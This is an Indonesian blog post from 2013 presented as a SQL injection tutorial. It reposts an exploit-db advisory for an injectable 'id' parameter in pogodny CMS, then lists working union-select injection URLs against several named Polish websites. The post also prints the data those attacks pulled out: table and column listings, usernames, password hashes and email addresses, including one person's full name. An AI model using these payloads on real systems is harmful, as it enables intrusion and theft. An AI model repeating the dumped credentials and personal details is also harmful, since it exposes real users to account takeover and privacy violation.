Y00AOebLhlCX59D11qensmHJY7s Tutorial SQL Injection by matthews Created (c) by Princexells Seyka (Princelling Saki)

Minggu, 25 Agustus 2013

0 Tutorial SQL Injection by matthews

gunakan ini untuk belajar yah kk kk Q , seperti belajar manual atau pakek scehmafuzzy ,


bug take from http://www.exploit-db.com/exploits/11473

--------------------------------------------------------------------------------------------------------------

Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: High

Fix:
# N/A Vendor notified 08.02.2010

It was found that "pogodny CMS" does not validate properly the "id" parameter
value.

Solution:
# Input validation of "id" parameter should be corrected.


Vulnerability:
# http://server/?modul=niusy&id=61[Sqli]

Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com
# Contacts: support[-at-]ariko-security.com


Ariko-Security
vuln@ariko-security.com
tel.: +48512946012 (Mo-Fr 10.00-20.00 CET)


---------------------------------------------------------------------------------------------------------------------------------------------------



pogodny_users,pogodny_users_kategorie
id,user,osoba,haslo,mail,www,kategoria,newsletter,sesja,opis,data_dodania,data_aktualizacji

http://www.krupowa.pttk.pl/index.php?modul=niusy&id=20%20union%20select%20concat_ws%280x3a,id,user,osoba,haslo,mail%29,2+from+pogodny_users--

9:test::b9e71e448bd6b4c525a34bec398f2244:kr@vip.wp.pl


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


http://www.michalin.pl/index.php?modul=niusy&id=82%20union%20select%20group_concat%28table_name%29,2+from+information_schema.tables+where+table_schema=database%28%29--

forum_acl_users  forum_config

http://www.michalin.pl/index.php?modul=niusy&id=82%20union%20select%20group_concat%28column_name%29,2+from+information_schema.columns+where+table_name=0x666F72756D5F636F6E666967--

config_name,config_value,is_dynamic

http://www.michalin.pl/index.php?modul=niusy&id=82%20union%20select%20concat_ws%280x3a,config_name,config_value,is_dynamic%29,2+from+forum_config

increment_user_id:0:1

http://www.michalin.pl/index.php?modul=niusy&id=82%20union%20select%20group_concat%28column_name%29,2+from+information_schema.columns+where+table_name=0x666F72756D5F61636C5F7573657273--

user_id,forum_id,auth_option_id,auth_role_id,auth_setting

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://wybicki.net/index.php?modul=niusy&id=5%20union%20select%20group_concat%28table_name%29,2%20+from+information_schema.tables+where+table_schema=database%28%29--

pogodny_banery,pogodny_download,pogodny_download_kategorie,pogodny_faq,pogodny_galeria,pogodny_goscie,pogodny_komentarze,pogodny_komunikat,pogodny_linki,pogodny_linki_kategorie,pogodny_niusy,pogodny_niusy_kategorie,pogodny_statystyka,pogodny_taknie,pogodny_trejs,pogodny_users,pogodny_users_kategorie,pogodny_ustawienia,pogodny_zdjecia,pogod

http://wybicki.net/index.php?modul=niusy&id=5%20union%20select%20concat_ws%280x3a,id,user,osoba,haslo,mail%29,2+from+pogodny_users--

12:liceum25:KR:b89819cc09f665536c27ae969d6bfbdb:kr@kr.media.pl


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


http://www.rolnet.pl/index.php?modul=niusy&id=15%20union%20select%20group_concat%28table_name%29,2%20+from+information_schema.tables+where+table_schema=database%28%29--

pogodny_banery,pogodny_download,pogodny_faq,pogodny_galeria,pogodny_goscie,pogodny_komentarze,pogodny_komunikat,pogodny_linki,pogodny_linki_kategorie,pogodny_niusy,pogodny_niusy_kategorie,pogodny_statystyka,pogodny_taknie,pogodny_trejs,pogodny_users,pogodny_users_kategorie,pogodny_ustawienia,pogodny_zdjecia,pogodny_zdjecia_kategorie

http://www.rolnet.pl/index.php?modul=niusy&id=15%20union%20select%20concat_ws%280x3a,id,user,osoba,haslo,mail%29,2+from+pogodny_users--

10:rolNET9::9c094856dffb5591ea952e7df152b018:kr@kr.media.pl


----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://www.wdrodzenaratunek.pl/index.php?modul=niusy&id=6%20union%20select%20group_concat%28table_name%29,2%20+from+information_schema.tables+where+table_schema=database%28%29--

pogodny_banery,pogodny_download,pogodny_faq,pogodny_galeria,pogodny_goscie,pogodny_komentarze,pogodny_komunikat,pogodny_linki,pogodny_linki_kategorie,pogodny_niusy,pogodny_niusy_kategorie,pogodny_statystyka,pogodny_taknie,pogodny_trejs,pogodny_users,pogodny_users_kategorie,pogodny_ustawienia,pogodny_zdjecia,pogodny_zdjecia_kategorie

http://www.wdrodzenaratunek.pl/index.php?modul=niusy&id=6%20union%20select%20concat_ws%280x3a,id,user,osoba,haslo,mail%29,2+from+pogodny_users--

48:kolacz:Joanna Kolacz:02885d951271d7607bcf342305ad6557:jkk1@wp.pl





Artikel Terkait

Ditulis Oleh : Nyubi Crew

Artikel Tutorial SQL Injection by matthews ini ditulis oleh Nyubi Crew pada hari Minggu, 25 Agustus 2013. Terimakasih atas kunjungan Anda pada blog ini. Kritik dan saran tentang Tutorial SQL Injection by matthews dapat Anda sampaikan melalui kotak komentar diatas.